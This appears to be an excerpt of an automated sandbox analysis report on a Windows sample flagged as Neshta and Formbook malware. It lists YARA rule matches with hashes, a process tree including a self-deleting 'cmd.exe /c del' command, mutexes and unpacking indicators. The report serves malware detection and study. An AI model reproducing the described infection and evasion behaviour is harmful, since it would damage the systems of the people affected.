          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.svchost.com.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@15/122@1/1
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_004041CD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,2_2_004041CD
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00402020 CoCreateInstance,MultiByteToWideChar,2_2_00402020
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeFile created: C:\Users\user\AppData\Roaming\hbqilrpJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_01
          Source: C:\Windows\svchost.comMutant created: \Sessions\1\BaseNamedObjects\MutexPolesskayaGlush*.* svchost.com n X . t N t h ` T 5 @
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\Users\user\AppData\Local\Temp\3582-490Jump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: vi0EwpbUht.exeMetadefender: Detection: 91%
          Source: vi0EwpbUht.exeReversingLabs: Detection: 100%
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile read: C:\Users\user\Desktop\vi0EwpbUht.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\vi0EwpbUht.exe 'C:\Users\user\Desktop\vi0EwpbUht.exe'
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\svchost.com 'C:\Windows\svchost.com' 'C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe'
          Source: C:\Windows\svchost.comProcess created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeProcess created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe' Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe' Jump to behavior
          Source: C:\Windows\svchost.comProcess created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe Jump to behavior
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeProcess created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'Jump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: netstat.pdbGCTL source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.439100550.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: vi0EwpbUht.exe, 00000002.00000003.327241678.0000000003140000.00000004.00000001.sdmp, vi0EwpbUht.exe, 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, elxhan.exe, 00000007.00000002.565127229.0000000000B0F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vi0EwpbUht.exe, elxhan.exe, NETSTAT.EXE, help.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.439100550.0000000007CA0000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeUnpacked PE file: 3.2.vi0EwpbUht.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeUnpacked PE file: 7.2.elxhan.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,2_2_00405CFF
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040802C push 00408052h; ret 1_2_0040804A
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004070A4 push 004070D0h; ret 1_2_004070C8
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004041D8 push 00404204h; ret 1_2_004041FC
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004041A0 push 004041CCh; ret 1_2_004041C4
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404256 push 00404284h; ret 1_2_0040427C
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404258 push 00404284h; ret 1_2_0040427C
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404210 push 0040423Ch; ret 1_2_00404234
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004042C8 push 004042F4h; ret 1_2_004042EC
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404290 push 004042BCh; ret 1_2_004042B4
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404370 push 0040439Ch; ret 1_2_00404394
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404300 push 0040432Ch; ret 1_2_00404324
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404338 push 00404364h; ret 1_2_0040435C
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004043E0 push 0040440Ch; ret 1_2_00404404
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004043A8 push 004043D4h; ret 1_2_004043CC
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00410778 push 00406D36h; ret 1_2_004107C6
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040D7C0 push 00403D79h; ret 1_2_0040D809
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040D9F0 push 00403F84h; ret 1_2_0040DA14
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DA28 push 00403FBCh; ret 1_2_0040DA4C
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00411AC4 push 00408052h; ret 1_2_00411AE2
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00410B3C push 004070D0h; ret 1_2_00410B60
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DC70 push 00404204h; ret 1_2_0040DC94
